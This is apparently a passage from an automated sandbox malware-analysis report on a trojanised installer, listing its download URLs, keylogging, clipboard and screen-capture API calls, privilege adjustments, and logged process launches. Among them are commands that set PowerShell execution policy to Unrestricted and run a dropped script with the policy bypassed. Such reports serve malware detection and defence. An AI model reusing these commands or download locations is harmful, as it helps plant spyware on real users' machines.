    Source: 360instpatch.exe, 00000008.00000003.1831082054.0000000005033000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.microso
    Source: svchost.exe, 0000000C.00000003.1825614884.000001A6AFB32000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.12.dr, edb.log.12.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
    Source: edb.log.12.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
    Source: edb.log.12.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
    Source: edb.log.12.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
    Source: svchost.exe, 0000000C.00000003.1825614884.000001A6AFB32000.00000004.00000800.00020000.00000000.sdmp, edb.log.12.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
    Source: powershell.exe, 00000006.00000002.1774677766.0000000005685000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000006.00000002.1774677766.0000000005B9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1774677766.0000000005E88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
    Source: wyySetups64.exe, 00000000.00000002.1810189166.000000000080D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gwwifha84989.oss-ap-northeast-2.aliyuncs.com/
    Source: wyySetups64.exe, 00000000.00000002.1810189166.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gwwifha84989.oss-ap-northeast-2.aliyuncs.com/34-1002
    Source: wyySetups64.exe, 00000000.00000002.1810189166.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, wyySetups64.exe, 00000000.00000002.1809349190.0000000000198000.00000004.00000010.00020000.00000000.sdmp, wyySetups64.exe, 00000000.00000002.1809394272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, wyySetups64.exe, 00000001.00000002.4114622663.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://gwwifha84989.oss-ap-northeast-2.aliyuncs.com/360instpatch.exe
    Source: wyySetups64.exe, 00000000.00000002.1810189166.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gwwifha84989.oss-ap-northeast-2.aliyuncs.com/360instpatch.exe0/
    Source: wyySetups64.exe, 00000000.00000002.1809349190.0000000000198000.00000004.00000010.00020000.00000000.sdmp, wyySetups64.exe, 00000000.00000002.1809394272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, wyySetups64.exe, 00000001.00000002.4114622663.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://gwwifha84989.oss-ap-northeast-2.aliyuncs.com/360instpatch.exen
    Source: wyySetups64.exe, 00000000.00000002.1810189166.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gwwifha84989.oss-ap-northeast-2.aliyuncs.com/360instpatch.exez
    Source: 360instpatch.exeString found in binary or memory: https://hao.360.cn
    Source: 360instpatch.exeString found in binary or memory: https://hao.360.cn/
    Source: 360instpatch.exeString found in binary or memory: https://hao.360.cn/?installer
    Source: 360instpatch.exe, 00000008.00000000.1789664825.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: https://hao.360.cn/?installerhttps://hao.360.cnhttps://http://https://hao.360.cn/%s
    Source: 360instpatch.exe, 00000008.00000002.4115869359.000000000155E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.commDataAPPDATA=C:
    Source: powershell.exe, 00000006.00000002.1778471826.0000000006598000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: svchost.exe, 0000000C.00000003.1825614884.000001A6AFB32000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.12.dr, edb.log.12.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
    Source: edb.log.12.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
    Source: wyySetups64.exe, wyySetups64.exe.0.drString found in binary or memory: https://sectigo.com/CPS0
    Source: wyySetups64.exe, 00000000.00000002.1818515504.000000000325B000.00000004.00000010.00020000.00000000.sdmp, wyySetups64.exe, 00000000.00000002.1810189166.0000000000821000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797435191.0000000004239000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797588551.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.8.dr, sites.dll.8.dr, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/0
    Source: 360instpatch.exe, 00000008.00000003.1797435191.0000000004239000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797588551.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.8.dr, sites.dll.8.drString found in binary or memory: https://www.globalsign.com/repository/03
    Source: sites.dll.8.drString found in binary or memory: https://www.globalsign.com/repository/06
    Source: wyySetups64.exe, wyySetups64.exe.0.drString found in binary or memory: https://www.innosetup.com/
    Source: wyySetups64.exe, wyySetups64.exe.0.drString found in binary or memory: https://www.remobjects.com/ps
    Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknown HTTPS traffic detected: 149.129.12.34:443 -> 192.168.2.4:49735 version: TLS 1.2

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe Code function: [esc] 1_2_0337E850
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe Code function: 1_2_0337E850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe Code function: 1_2_0337BC70 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe Code function: 1_2_0337E4F0 Sleep,CreateMutexW,GetLastError,SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe Windows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dll

    E-Banking Fraud

    Source: C:\Users\user\Downloads\360instpatch.exe Code function: _memset,GetUserNameW,__wcsicoll,_memset,GetModuleFileNameW,StrStrIW, Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads 8_2_00B68A46

    Operating System Destruction

    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe Process information set: 01 00 00 00
    Source: C:\Users\user\Desktop\wyySetups64.exe Code function: 0_2_00D51087 NtdllDefWindowProc_W
    Source: C:\Users\user\Desktop\wyySetups64.exe Code function: 0_2_00D51A37 GetModuleHandleA,CreateWindowExW,SendMessageW,CreateThread,PostQuitMessage,NtdllDefWindowProc_W
    Source: C:\Users\user\Downloads\360instpatch.exe Code function: 8_2_00B1E080: GetCurrentProcessId,CreateFileW,DeviceIoControl,CloseHandle
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe Code function: 1_2_0337B43F ExitWindowsEx
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe Code function: 1_2_0337B41B ExitWindowsEx
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe Code function: 1_2_0337B463 ExitWindowsEx
    Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
    Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\sites.dll C1EB83993C85E01EE6AE84EB6E05744FF8C3CCC02C41D09C22286E3012EF46FC
    Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\{DFE14265-3905-4689-9143-1E1473933304}.tmp\360P2SP.dll 0ECA2E140F973B2011C633D4D92E512A1F77E1DA610CFE0F4538C0B451270016
    Source: wyySetups64.exeStatic PE information: invalid certificate
    Source: wyySetups64.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
    Source: 360instpatch[1].exe.0.drStatic PE information: Resource name: CAB type: Microsoft Cabinet archive data, many, 1346052 bytes, 3 files, at 0x2c +A "sites.dll" +A "themes\theme_NewInstallAir.xml", number 1, 81 datablocks, 0x1 compression
    Source: 360instpatch[1].exe.0.drStatic PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 304652 bytes, 1 file, at 0x2c +A "360P2SP.dll", ID 808, number 1, 22 datablocks, 0x1503 compression
    Source: 360instpatch[1].exe.0.drStatic PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 348915 bytes, 1 file, at 0x2c +A "urlproc.dll", number 1, 22 datablocks, 0x1 compression
    Source: 360instpatch[1].exe.0.drStatic PE information: Resource name: LETTER type: Microsoft Cabinet archive data, Windows 2000/XP setup, 781 bytes, 1 file, at 0x2c +A "letter.rtf", number 1, 1 datablock, 0x1 compression
    Source: 360instpatch[1].exe.0.drStatic PE information: Resource name: LICENCE type: Microsoft Cabinet archive data, Windows 2000/XP setup, 12165 bytes, 1 file, at 0x2c +A "licence.rtf", number 1, 2 datablocks, 0x1 compression
    Source: 360instpatch[1].exe.0.drStatic PE information: Resource name: PRIVACY type: Microsoft Cabinet archive data, Windows 2000/XP setup, 11763 bytes, 1 file, at 0x2c +A "privacy.rtf", number 1, 1 datablock, 0x1 compression
    Source: 360instpatch[1].exe.0.drStatic PE information: Resource name: VIEWER type: Microsoft Cabinet archive data, Windows 2000/XP setup, 751718 bytes, 1 file, at 0x2c +A "AgreementViewer.exe", number 1, 53 datablocks, 0x1 compression
    Source: 360instpatch.exe.0.drStatic PE information: Resource name: CAB type: Microsoft Cabinet archive data, many, 1346052 bytes, 3 files, at 0x2c +A "sites.dll" +A "themes\theme_NewInstallAir.xml", number 1, 81 datablocks, 0x1 compression
    Source: 360instpatch.exe.0.drStatic PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 304652 bytes, 1 file, at 0x2c +A "360P2SP.dll", ID 808, number 1, 22 datablocks, 0x1503 compression
    Source: 360instpatch.exe.0.drStatic PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 348915 bytes, 1 file, at 0x2c +A "urlproc.dll", number 1, 22 datablocks, 0x1 compression
    Source: 360instpatch.exe.0.drStatic PE information: Resource name: LETTER type: Microsoft Cabinet archive data, Windows 2000/XP setup, 781 bytes, 1 file, at 0x2c +A "letter.rtf", number 1, 1 datablock, 0x1 compression
    Source: 360instpatch.exe.0.drStatic PE information: Resource name: LICENCE type: Microsoft Cabinet archive data, Windows 2000/XP setup, 12165 bytes, 1 file, at 0x2c +A "licence.rtf", number 1, 2 datablocks, 0x1 compression
    Source: 360instpatch.exe.0.drStatic PE information: Resource name: PRIVACY type: Microsoft Cabinet archive data, Windows 2000/XP setup, 11763 bytes, 1 file, at 0x2c +A "privacy.rtf", number 1, 1 datablock, 0x1 compression
    Source: 360instpatch.exe.0.drStatic PE information: Resource name: VIEWER type: Microsoft Cabinet archive data, Windows 2000/XP setup, 751718 bytes, 1 file, at 0x2c +A "AgreementViewer.exe", number 1, 53 datablocks, 0x1 compression
    Source: wyySetups64.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
    Source: wyySetups64.exe, 00000000.00000002.1816555843.00000000025F8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs wyySetups64.exe
    Source: wyySetups64.exe, 00000000.00000003.1676294648.0000000002651000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs wyySetups64.exe
    Source: wyySetups64.exe, 00000000.00000000.1652850618.00000000006F4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs wyySetups64.exe
    Source: wyySetups64.exe, 00000001.00000002.4117289631.00000000024C8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs wyySetups64.exe
    Source: wyySetups64.exeBinary or memory string: OriginalFileName vs wyySetups64.exe
    Source: wyySetups64.exe.0.drBinary or memory string: OriginalFileName vs wyySetups64.exe
    Source: wyySetups64.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
    Source: 360instpatch.exe.0.drBinary string: ZOTAC ZENFASTZENFAS XSTAR XS TAK VASEKY UKINGS TYH TXRUI TURXUN TEKISM TEELKOOUTAISU SS DSUPERSSPSTARSWAYSTARRAM SPCC SHINEDOE SHINEDIS SHINEDISKSAMSWEETREEINNO REEINN RUNENG RAMSTA S QIDAN POWERSSD NETAC SSNETAC SMICROFLA SH MICROFLASH MICROFLAS MERELAIR MAXSUNMACMEMOR LENOVO SLENOVO SLANSHIKUAIKAKINGSTEKKINGSSD_ACSC4MACSC2MACJC2MKINGSPECKINGSHARE KINGSHAR EKING SHAREKING SHAREKING SHA REKINGSANDKINGRICHKINGBANKKINGDINGKINGDIANKDATAJUNSHI INTEIFUNKIFOUNDI-FLASHHY SPEED HY SDEED HISTOR HIGHXGOWE GEIL ZENITHGAMERGALAIRD GALA GAINWARDGLOWAYGLOWA FORSAFASTDISKFASPEE FASPEEDEVTRANEEKOOEAGET SS DDOMONDERLERDRAGONDICABOFITBIOSTAR BIOSTA ASGARD ASINT ASIN APACER ANUCELL GENERIC NCARDHYNIXTECLASTTECLAS KINGFAST COLORFUL COLORFUL SSD NVME ATA KINGSTONPLEXTOR PX-PLEXTO PX-PLEXTO PX-GALAXMICRON MICRON_MLITEONITLITEONSANDISK SANDIS MKNSSDCRUNCOREEDGEPLEXTORMTFDV4-CTM4-CTCRUCIAL ADATA ADATA ADAT PNYAPACERG.SKILLOCZKINGSTONCORSAIRINTELFUJITSUTOSHIB TOSHIBASAMXUNG SAMSUNG1SAMSUN SAMSUNGWDSEAGATESTATA AVD ASDK APPLE HDD ModelASSOCIATORS OF {Win32_DiskPartition.DeviceID='%s'} where ResultClass = Win32_DiskDriveDeviceIDASSOCIATORS OF {Win32_LogicalDisk.DeviceID='%s'} where ResultClass = Win32_DiskPartitionROOT\CIMV2Index\Device\Harddisk\\.\c:%usotmSOFTWARE\360Safe\softmgr\dg{from}{ver}{mid}s.360.cn/safe/instcomp.htm?soft=425&status=%d&mid={mid}&from={from}&ver={ver}&vv=10&appkey=&usetime=%d&downrate=%d&downlen=%dl,M~UG
    Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winEXE@16/33@8/14
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BEE5930 SetLastError,GetLastError,SetLastError,GetLastError,_wcsrchr,_wcsncpy,_strerror,MultiByteToWideChar,_wcsncpy,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,FormatMessageW,_wcstok,_vswprintf_s,_wcsncpy,GetSystemTime,LocalFree,FreeLibrary,8_2_6BEE5930
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_03377B70 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,1_2_03377B70
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_03377740 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,1_2_03377740
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_03377620 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess,1_2_03377620
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BEE7A1F GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,8_2_6BEE7A1F
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_03376C50 wsprintfW,MultiByteToWideChar,GetDriveTypeW,GetDiskFreeSpaceExW,_memset,GlobalMemoryStatusEx,swprintf,swprintf,1_2_03376C50
    Source: C:\Users\user\Desktop\wyySetups64.exeCode function: 0_2_1000F260 CreateToolhelp32Snapshot,Process32FirstW,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,CloseHandle,_wcsicmp,CloseHandle,Process32NextW,CloseHandle,0_2_1000F260
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_03376150 wsprintfW,_memset,lstrcatW,lstrcatW,lstrcatW,CoCreateInstance,wsprintfW,RegOpenKeyExW,_memset,wsprintfW,RegOpenKeyExW,_memset,RegQueryValueExW,lstrcatW,lstrcatW,lstrcatW,RegCloseKey,lstrlenW,lstrcatW,1_2_03376150
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B80145 _memset,FindResourceW,SizeofResource,LoadResource,LockResource,8_2_00B80145
    Source: C:\Users\user\Downloads\360instpatch.exeFile created: C:\Program Files (x86)\360
    Source: C:\Users\user\Desktop\wyySetups64.exeFile created: C:\Users\user\AppData\Roaming\wyySetups64.exe
    Source: C:\Users\user\Downloads\360instpatch.exeMutant created: NULL
    Source: C:\Users\user\Downloads\360instpatch.exeMutant created: \Sessions\1\BaseNamedObjects\1830B7BD-F7A3-4c4d-989B-C004DE465EDE 4460
    Source: C:\Users\user\Downloads\360instpatch.exeMutant created: \Sessions\1\BaseNamedObjects\1830B7BD-F7A3-4c4d-989B-C004DE465EDE 3192
    Source: C:\Users\user\Downloads\360instpatch.exeMutant created: \Sessions\1\BaseNamedObjects\Q360SafeInstallerMutex
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2916:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2332:120:WilError_03
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeMutant created: \Sessions\1\BaseNamedObjects\2024.12. 3
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kt5adsyn.rvv.ps1
    Source: C:\Users\user\Desktop\wyySetups64.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
    Source: C:\Users\user\Desktop\wyySetups64.exeFile read: C:\Users\user\Desktop\desktop.ini
    Source: C:\Users\user\Desktop\wyySetups64.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: wyySetups64.exeString found in binary or memory: es>false</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvaila
    Source: wyySetups64.exeString found in binary or memory: le> <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd>
    Source: 360instpatch.exeString found in binary or memory: /pid=%s /noreboot=1 /installer=1 /SMARTSILENCE
    Source: 360instpatch.exeString found in binary or memory: --secore-restore --360se_pid=8000041 --silent-install --not-create-mplnk
    Source: wyySetups64.exeString found in binary or memory: -Helper process exited with failure code: 0x%x
    Source: wyySetups64.exeString found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
    Source: wyySetups64.exeString found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
    Source: wyySetups64.exeString found in binary or memory: /LoadInf=
    Source: C:\Users\user\Desktop\wyySetups64.exeFile read: C:\Users\user\Desktop\wyySetups64.exe
    Source: unknownProcess created: C:\Users\user\Desktop\wyySetups64.exe "C:\Users\user\Desktop\wyySetups64.exe"
    Source: C:\Users\user\Desktop\wyySetups64.exeProcess created: C:\Users\user\AppData\Roaming\wyySetups64.exe "C:\Users\user\AppData\Roaming\wyySetups64.exe"
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
    Source: unknownProcess created: C:\Users\user\Downloads\360instpatch.exe C:\Users\user\Downloads\360instpatch.exe
    Source: unknownProcess created: C:\Users\user\Downloads\360instpatch.exe C:\Users\user\Downloads\360instpatch.exe
    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: apphelp.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: mpr.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: version.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: netapi32.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: winhttp.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: netutils.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: mswsock.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: msvcp140.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: vcruntime140.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: wininet.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: uxtheme.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: windows.storage.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: wldp.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: ntmarta.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: propsys.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: profapi.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: edputil.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: urlmon.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: iertutil.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: srvcli.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: sspicli.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: wintypes.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: appresolver.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: bcp47langs.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: slc.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: userenv.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: sppc.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: textinputframework.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: coreuicomponents.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: coremessaging.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: ondemandconnroutehelper.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: iphlpapi.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: winnsi.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: dnsapi.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: rasadhlp.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: fwpuclnt.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: schannel.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: mskeyprotect.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: ntasn1.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: msasn1.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: dpapi.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: cryptsp.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: rsaenh.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: gpapi.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: ncrypt.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: ncryptsslp.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: msv1_0.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: ntlmshared.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: cryptdll.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: apphelp.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: mpr.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: version.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: netapi32.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: winhttp.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: netutils.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: mswsock.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: msvcp140.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: vcruntime140.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: wininet.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: uxtheme.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: windows.storage.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: wldp.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: winmm.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: napinsp.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: pnrpnsp.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: wshbth.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: nlaapi.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: iphlpapi.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: dnsapi.dll
